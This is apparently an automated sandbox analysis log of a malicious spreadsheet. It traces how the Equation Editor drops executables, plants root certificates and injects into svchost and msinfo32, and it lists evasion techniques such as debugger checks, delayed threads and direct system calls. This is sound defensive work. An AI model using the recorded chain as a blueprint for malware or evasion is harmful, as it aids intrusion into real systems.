Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: odbc32.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: mozglue.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: wdscore.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: riched32.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: riched20.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msinfo32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Windows\SysWOW64\RichEd32.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: IND24072113.xlsx | Static file information: File size 1431575 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uAjPOONiWk.exe, 00000007.00000000.481547931.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uAjPOONiWk.exe, 00000009.00000002.639603944.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.429340915.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.428942724.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.497270850.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479680462.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.497270850.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479390301.0000000000450000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498304702.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498006894.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.0000000002270000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.639902126.000000000299C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639530114.00000000002D6000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510508746.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.552686971.000000000139C000.00000004.80000000.00040000.00000000.sdmp
Source: IND24072113.xlsx | Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040EB70 LoadLibraryA,GetProcAddress, 5_2_0040EB70
Source: kontempt2.1[1].exe.2.dr | Static PE information: real checksum: 0xa2135 should be: 0x14f715
Source: word.exe.2.dr | Static PE information: real checksum: 0xa2135 should be: 0x14f715
Source: sqlite3.dll.8.dr | Static PE information: section name: /4
Source: sqlite3.dll.8.dr | Static PE information: section name: /19
Source: sqlite3.dll.8.dr | Static PE information: section name: /31
Source: sqlite3.dll.8.dr | Static PE information: section name: /45
Source: sqlite3.dll.8.dr | Static PE information: section name: /57
Source: sqlite3.dll.8.dr | Static PE information: section name: /70
Source: sqlite3.dll.8.dr | Static PE information: section name: /81
Source: sqlite3.dll.8.dr | Static PE information: section name: /92
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00490D70 push edx; retf 5_2_00490E83
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004171D1 push ecx; ret 5_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040D079 push eax; retf 6_2_0040D086
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004140CE push ds; ret 6_2_004140CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041EA53 push ebx; retf 6_2_0041EAAA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00408263 push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004122CA push 845B296Ch; iretd 6_2_004122D2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040AA85 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004082AF push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040AAB4 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00403300 push eax; ret 6_2_00403302
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00411B09 push eax; ret 6_2_00411B0A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00408384 push ebx; iretd 6_2_00408387
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041ABAC push edx; retf 6_2_0041ABAD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041F463 push edi; retf 6_2_0041F46E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00418CDB push cs; ret 6_2_00418CE1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00417CEF push FFFFFFBBh; retf 6_2_00417CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004165CF push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00416612 push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004236DA push ebx; iretd 6_2_004236DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088DFA1 push ecx; ret 6_2_0088DFB4

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Windows\SysWOW64\msinfo32.exe | File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_004772DE
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_004375B0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00444078
Source: C:\Users\user\AppData\Roaming\word.exe | API/Special instruction interceptor: Address: 3A463BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008D0101 rdtsc 6_2_008D0101
Source: C:\Windows\SysWOW64\msinfo32.exe | Window / User API: threadDelayed 1043
Source: C:\Windows\SysWOW64\msinfo32.exe | Window / User API: threadDelayed 8920
Source: C:\Windows\SysWOW64\msinfo32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Users\user\AppData\Roaming\word.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_5-82647
Source: C:\Users\user\AppData\Roaming\word.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_5-81173
Source: C:\Users\user\AppData\Roaming\word.exe | API coverage: 3.2 %
Source: C:\Windows\SysWOW64\msinfo32.exe | API coverage: 1.8 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3468 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688 | Thread sleep count: 1043 > 30
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688 | Thread sleep time: -2086000s >= -30000s
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3760 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688 | Thread sleep count: 8920 > 30
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688 | Thread sleep time: -17840000s >= -30000s
Source: C:\Windows\SysWOW64\msinfo32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\SysWOW64\msinfo32.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0045DD7C FindFirstFileW,FindClose, 5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_0044BF8D
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_0040E470
Source: C:\Users\user\AppData\Roaming\word.exe | API call chain: ExitProcess graph end node graph_5-81130
Source: C:\Users\user\AppData\Roaming\word.exe | API call chain: ExitProcess graph end node graph_5-81051
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msinfo32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008D0101 rdtsc 6_2_008D0101
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008807AC NtCreateMutant,LdrInitializeThunk, 6_2_008807AC
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0045A259 BlockInput, 5_2_0045A259
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040EB70 LoadLibraryA,GetProcAddress, 5_2_0040EB70
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0360190D mov edx, dword ptr fs:[00000030h] 2_2_0360190D
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_03A46688 mov eax, dword ptr fs:[00000030h] 5_2_03A46688
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_03A46628 mov eax, dword ptr fs:[00000030h] 5_2_03A46628
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_03A44FE8 mov eax, dword ptr fs:[00000030h] 5_2_03A44FE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00870080 mov ecx, dword ptr fs:[00000030h] 6_2_00870080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008700EA mov eax, dword ptr fs:[00000030h] 6_2_008700EA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008926F8 mov eax, dword ptr fs:[00000030h] 6_2_008926F8
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 5_2_00426DA1
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0042202E SetUnhandledExceptionFilter, 5_2_0042202E
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_004230F5
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00417D93
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00421FA7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQueryInformationProcess: Direct from: 0x774CFAFA
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtCreateUserProcess: Direct from: 0x774D093E
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtCreateKey: Direct from: 0x774CFB62
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWx ohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQuerySystemInformation: Direct from: 0x774D20DE
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQueryDirectoryFile: Direct from: 0x774CFDBA
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtWriteVirtualMemory: Direct from: 0x774D213E
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtCreateFile: Direct from: 0x774D00D6
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetTimer: Direct from: 0x774D021A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtOpenFile: Direct from: 0x774CFD86
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtOpenKeyEx: Direct from: 0x774CFA4A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtAllocateVirtualMemory: Direct from: 0x774CFAE2
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtResumeThread: Direct from: 0x774D008D
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtOpenKeyEx: Direct from: 0x774D103A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtUnmapViewOfSection: Direct from: 0x774CFCA2
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtDelayExecution: Direct from: 0x774CFDA1
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetInformationProcess: Direct from: 0x774CFB4A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetInformationThread: Direct from: 0x774CF9CE
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtReadFile: Direct from: 0x774CF915
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtMapViewOfSection: Direct from: 0x774CFC72
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtCreateThreadEx: Direct from: 0x774D08C6
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtDeviceIoControlFile: Direct from: 0x774CF931
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtRequestWaitReplyPort: Direct from: 0x753C6BCE
